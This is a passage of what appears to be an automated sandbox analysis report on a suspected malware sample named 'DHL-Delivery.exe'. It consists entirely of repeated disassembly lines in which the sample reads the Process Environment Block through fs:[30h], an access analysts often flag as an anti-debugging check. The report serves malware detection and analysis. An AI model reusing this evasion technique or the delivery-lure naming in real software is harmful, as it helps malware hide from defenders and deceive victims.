    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10EFD0 mov eax, dword ptr fs:[00000030h]6_2_1E10EFD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10EFD0 mov edx, dword ptr fs:[00000030h]6_2_1E10EFD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16AFF3 mov eax, dword ptr fs:[00000030h]6_2_1E16AFF3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E173FF0 mov eax, dword ptr fs:[00000030h]6_2_1E173FF0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E173FF0 mov eax, dword ptr fs:[00000030h]6_2_1E173FF0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A2FF5 mov eax, dword ptr fs:[00000030h]6_2_1E1A2FF5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A2FF5 mov eax, dword ptr fs:[00000030h]6_2_1E1A2FF5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100FE0 mov eax, dword ptr fs:[00000030h]6_2_1E100FE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100FE0 mov eax, dword ptr fs:[00000030h]6_2_1E100FE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100FE0 mov eax, dword ptr fs:[00000030h]6_2_1E100FE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100FE0 mov eax, dword ptr fs:[00000030h]6_2_1E100FE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100FE0 mov eax, dword ptr fs:[00000030h]6_2_1E100FE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100FE0 mov eax, dword ptr fs:[00000030h]6_2_1E100FE0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E159FE4 mov eax, dword ptr fs:[00000030h]6_2_1E159FE4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E159FE4 mov eax, dword ptr fs:[00000030h]6_2_1E159FE4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16AFE4 mov eax, dword ptr fs:[00000030h]6_2_1E16AFE4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16CFE2 mov eax, dword ptr fs:[00000030h]6_2_1E16CFE2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16CFE2 mov eax, dword ptr fs:[00000030h]6_2_1E16CFE2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16CFE2 mov eax, dword ptr fs:[00000030h]6_2_1E16CFE2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16BC10 mov eax, dword ptr fs:[00000030h]6_2_1E16BC10
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A3C15 mov eax, dword ptr fs:[00000030h]6_2_1E1A3C15
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C0B mov eax, dword ptr fs:[00000030h]6_2_1E199C0B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D9C25 mov ecx, dword ptr fs:[00000030h]6_2_1E0D9C25
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15EC3E mov eax, dword ptr fs:[00000030h]6_2_1E15EC3E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15EC3E mov eax, dword ptr fs:[00000030h]6_2_1E15EC3E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15EC3E mov eax, dword ptr fs:[00000030h]6_2_1E15EC3E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1C36 mov eax, dword ptr fs:[00000030h]6_2_1E1B1C36
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B2C35 mov eax, dword ptr fs:[00000030h]6_2_1E1B2C35
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E11EC22 mov eax, dword ptr fs:[00000030h]6_2_1E11EC22
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E11EC22 mov eax, dword ptr fs:[00000030h]6_2_1E11EC22
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E169C23 mov eax, dword ptr fs:[00000030h]6_2_1E169C23
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101C55 mov eax, dword ptr fs:[00000030h]6_2_1E101C55
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101C55 mov eax, dword ptr fs:[00000030h]6_2_1E101C55
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101C55 mov eax, dword ptr fs:[00000030h]6_2_1E101C55
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101C55 mov eax, dword ptr fs:[00000030h]6_2_1E101C55
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101C55 mov eax, dword ptr fs:[00000030h]6_2_1E101C55
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101C55 mov eax, dword ptr fs:[00000030h]6_2_1E101C55
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101C55 mov eax, dword ptr fs:[00000030h]6_2_1E101C55
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A6C49 mov eax, dword ptr fs:[00000030h]6_2_1E1A6C49
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E166C4F mov eax, dword ptr fs:[00000030h]6_2_1E166C4F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E7C52 mov eax, dword ptr fs:[00000030h]6_2_1E0E7C52
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E7C52 mov eax, dword ptr fs:[00000030h]6_2_1E0E7C52
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E7C52 mov eax, dword ptr fs:[00000030h]6_2_1E0E7C52
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E7C52 mov eax, dword ptr fs:[00000030h]6_2_1E0E7C52
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E7C52 mov eax, dword ptr fs:[00000030h]6_2_1E0E7C52
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E7C52 mov eax, dword ptr fs:[00000030h]6_2_1E0E7C52
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FDC50 mov eax, dword ptr fs:[00000030h]6_2_1E0FDC50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FDC50 mov eax, dword ptr fs:[00000030h]6_2_1E0FDC50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FDC50 mov eax, dword ptr fs:[00000030h]6_2_1E0FDC50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FDC50 mov eax, dword ptr fs:[00000030h]6_2_1E0FDC50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FDC50 mov eax, dword ptr fs:[00000030h]6_2_1E0FDC50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106C7B mov eax, dword ptr fs:[00000030h]6_2_1E106C7B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106C7B mov eax, dword ptr fs:[00000030h]6_2_1E106C7B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106C7B mov eax, dword ptr fs:[00000030h]6_2_1E106C7B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199C69 mov eax, dword ptr fs:[00000030h]6_2_1E199C69
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E115C64 mov eax, dword ptr fs:[00000030h]6_2_1E115C64
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15BC68 mov eax, dword ptr fs:[00000030h]6_2_1E15BC68
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15BC68 mov eax, dword ptr fs:[00000030h]6_2_1E15BC68
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E108C99 mov eax, dword ptr fs:[00000030h]6_2_1E108C99
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E108C99 mov eax, dword ptr fs:[00000030h]6_2_1E108C99
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E169C98 mov eax, dword ptr fs:[00000030h]6_2_1E169C98
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ACC95 mov eax, dword ptr fs:[00000030h]6_2_1E1ACC95
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1ACC95 mov eax, dword ptr fs:[00000030h]6_2_1E1ACC95
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1C94 mov eax, dword ptr fs:[00000030h]6_2_1E1B1C94
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E161C80 mov ecx, dword ptr fs:[00000030h]6_2_1E161C80
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E165C8C mov eax, dword ptr fs:[00000030h]6_2_1E165C8C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E184C87 mov eax, dword ptr fs:[00000030h]6_2_1E184C87
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10ACB0 mov eax, dword ptr fs:[00000030h]6_2_1E10ACB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10ACB0 mov eax, dword ptr fs:[00000030h]6_2_1E10ACB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E10ACB0 mov eax, dword ptr fs:[00000030h]6_2_1E10ACB0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DACAF mov eax, dword ptr fs:[00000030h]6_2_1E0DACAF
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DACAF mov eax, dword ptr fs:[00000030h]6_2_1E0DACAF
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DACAF mov eax, dword ptr fs:[00000030h]6_2_1E0DACAF
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15DCA1 mov eax, dword ptr fs:[00000030h]6_2_1E15DCA1
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E159CA0 mov eax, dword ptr fs:[00000030h]6_2_1E159CA0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E172CA0 mov eax, dword ptr fs:[00000030h]6_2_1E172CA0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E111CD0 mov eax, dword ptr fs:[00000030h]6_2_1E111CD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E111CD0 mov eax, dword ptr fs:[00000030h]6_2_1E111CD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E111CD0 mov eax, dword ptr fs:[00000030h]6_2_1E111CD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E111CD0 mov eax, dword ptr fs:[00000030h]6_2_1E111CD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D9CDD mov eax, dword ptr fs:[00000030h]6_2_1E0D9CDD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D9CDD mov eax, dword ptr fs:[00000030h]6_2_1E0D9CDD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D9CDD mov eax, dword ptr fs:[00000030h]6_2_1E0D9CDD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E17DCC0 mov eax, dword ptr fs:[00000030h]6_2_1E17DCC0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E168CC9 mov eax, dword ptr fs:[00000030h]6_2_1E168CC9
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E166CF0 mov eax, dword ptr fs:[00000030h]6_2_1E166CF0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E105CF9 mov eax, dword ptr fs:[00000030h]6_2_1E105CF9
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E105CF9 mov eax, dword ptr fs:[00000030h]6_2_1E105CF9
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1CF2 mov eax, dword ptr fs:[00000030h]6_2_1E1B1CF2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DBCE6 mov eax, dword ptr fs:[00000030h]6_2_1E0DBCE6
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E190CF7 mov eax, dword ptr fs:[00000030h]6_2_1E190CF7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E197CE5 mov eax, dword ptr fs:[00000030h]6_2_1E197CE5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E165D15 mov esi, dword ptr fs:[00000030h]6_2_1E165D15
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E165D15 mov eax, dword ptr fs:[00000030h]6_2_1E165D15
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E165D15 mov eax, dword ptr fs:[00000030h]6_2_1E165D15
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DDD05 mov eax, dword ptr fs:[00000030h]6_2_1E0DDD05
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15ED1D mov eax, dword ptr fs:[00000030h]6_2_1E15ED1D
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15ED1D mov ecx, dword ptr fs:[00000030h]6_2_1E15ED1D
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E169D04 mov eax, dword ptr fs:[00000030h]6_2_1E169D04
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EDD13 mov eax, dword ptr fs:[00000030h]6_2_1E0EDD13
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EDD13 mov eax, dword ptr fs:[00000030h]6_2_1E0EDD13
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EDD13 mov eax, dword ptr fs:[00000030h]6_2_1E0EDD13
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FED10 mov eax, dword ptr fs:[00000030h]6_2_1E0FED10
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104D30 mov eax, dword ptr fs:[00000030h]6_2_1E104D30
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E104D30 mov eax, dword ptr fs:[00000030h]6_2_1E104D30
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A6D3C mov eax, dword ptr fs:[00000030h]6_2_1E1A6D3C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E115D20 mov eax, dword ptr fs:[00000030h]6_2_1E115D20
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E172D20 mov eax, dword ptr fs:[00000030h]6_2_1E172D20
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E172D20 mov eax, dword ptr fs:[00000030h]6_2_1E172D20
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1D53 mov eax, dword ptr fs:[00000030h]6_2_1E1B1D53
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DAD40 mov eax, dword ptr fs:[00000030h]6_2_1E0DAD40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DAD40 mov eax, dword ptr fs:[00000030h]6_2_1E0DAD40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E173D40 mov eax, dword ptr fs:[00000030h]6_2_1E173D40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E173D40 mov eax, dword ptr fs:[00000030h]6_2_1E173D40
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E1D64 mov eax, dword ptr fs:[00000030h]6_2_1E0E1D64
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EFD60 mov eax, dword ptr fs:[00000030h]6_2_1E0EFD60
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0EFD60 mov eax, dword ptr fs:[00000030h]6_2_1E0EFD60
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov ecx, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov ecx, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov ecx, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov ecx, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F2D70 mov eax, dword ptr fs:[00000030h]6_2_1E0F2D70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E197D66 mov eax, dword ptr fs:[00000030h]6_2_1E197D66
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19AD92 mov eax, dword ptr fs:[00000030h]6_2_1E19AD92
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19AD92 mov eax, dword ptr fs:[00000030h]6_2_1E19AD92
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19AD92 mov eax, dword ptr fs:[00000030h]6_2_1E19AD92
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19AD92 mov eax, dword ptr fs:[00000030h]6_2_1E19AD92
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19AD92 mov eax, dword ptr fs:[00000030h]6_2_1E19AD92
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19AD92 mov eax, dword ptr fs:[00000030h]6_2_1E19AD92
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19AD92 mov eax, dword ptr fs:[00000030h]6_2_1E19AD92
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101D9F mov eax, dword ptr fs:[00000030h]6_2_1E101D9F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101D9F mov eax, dword ptr fs:[00000030h]6_2_1E101D9F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101D9F mov eax, dword ptr fs:[00000030h]6_2_1E101D9F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101D9F mov eax, dword ptr fs:[00000030h]6_2_1E101D9F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E101D9F mov eax, dword ptr fs:[00000030h]6_2_1E101D9F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E169D99 mov eax, dword ptr fs:[00000030h]6_2_1E169D99
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15ADB7 mov eax, dword ptr fs:[00000030h]6_2_1E15ADB7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100DB7 mov eax, dword ptr fs:[00000030h]6_2_1E100DB7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100DB7 mov eax, dword ptr fs:[00000030h]6_2_1E100DB7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100DB7 mov eax, dword ptr fs:[00000030h]6_2_1E100DB7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1DB4 mov eax, dword ptr fs:[00000030h]6_2_1E1B1DB4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E190DA1 mov eax, dword ptr fs:[00000030h]6_2_1E190DA1
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FFDC6 mov eax, dword ptr fs:[00000030h]6_2_1E0FFDC6
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D7DC7 mov eax, dword ptr fs:[00000030h]6_2_1E0D7DC7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D7DC7 mov eax, dword ptr fs:[00000030h]6_2_1E0D7DC7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D7DC7 mov eax, dword ptr fs:[00000030h]6_2_1E0D7DC7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E197DD2 mov eax, dword ptr fs:[00000030h]6_2_1E197DD2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E11FDC3 mov eax, dword ptr fs:[00000030h]6_2_1E11FDC3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E157DC0 mov eax, dword ptr fs:[00000030h]6_2_1E157DC0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E157DC0 mov eax, dword ptr fs:[00000030h]6_2_1E157DC0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E157DC0 mov eax, dword ptr fs:[00000030h]6_2_1E157DC0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E157DC0 mov eax, dword ptr fs:[00000030h]6_2_1E157DC0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E18BDC0 mov eax, dword ptr fs:[00000030h]6_2_1E18BDC0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E115DF2 mov eax, dword ptr fs:[00000030h]6_2_1E115DF2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E115DF2 mov eax, dword ptr fs:[00000030h]6_2_1E115DF2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E174DF3 mov eax, dword ptr fs:[00000030h]6_2_1E174DF3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E11ADF5 mov eax, dword ptr fs:[00000030h]6_2_1E11ADF5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106DE3 mov eax, dword ptr fs:[00000030h]6_2_1E106DE3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106DE3 mov eax, dword ptr fs:[00000030h]6_2_1E106DE3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106DE3 mov eax, dword ptr fs:[00000030h]6_2_1E106DE3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106DE3 mov eax, dword ptr fs:[00000030h]6_2_1E106DE3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106DE3 mov eax, dword ptr fs:[00000030h]6_2_1E106DE3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106DE3 mov eax, dword ptr fs:[00000030h]6_2_1E106DE3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106DE3 mov eax, dword ptr fs:[00000030h]6_2_1E106DE3
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E112DE7 mov eax, dword ptr fs:[00000030h]6_2_1E112DE7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E112DE7 mov eax, dword ptr fs:[00000030h]6_2_1E112DE7
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E7DF2 mov eax, dword ptr fs:[00000030h]6_2_1E0E7DF2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E161DEB mov eax, dword ptr fs:[00000030h]6_2_1E161DEB
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E161DEB mov eax, dword ptr fs:[00000030h]6_2_1E161DEB
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FBDF0 mov eax, dword ptr fs:[00000030h]6_2_1E0FBDF0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FBDF0 mov eax, dword ptr fs:[00000030h]6_2_1E0FBDF0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E107A10 mov edi, dword ptr fs:[00000030h]6_2_1E107A10
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106A1B mov eax, dword ptr fs:[00000030h]6_2_1E106A1B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E119A0B mov esi, dword ptr fs:[00000030h]6_2_1E119A0B
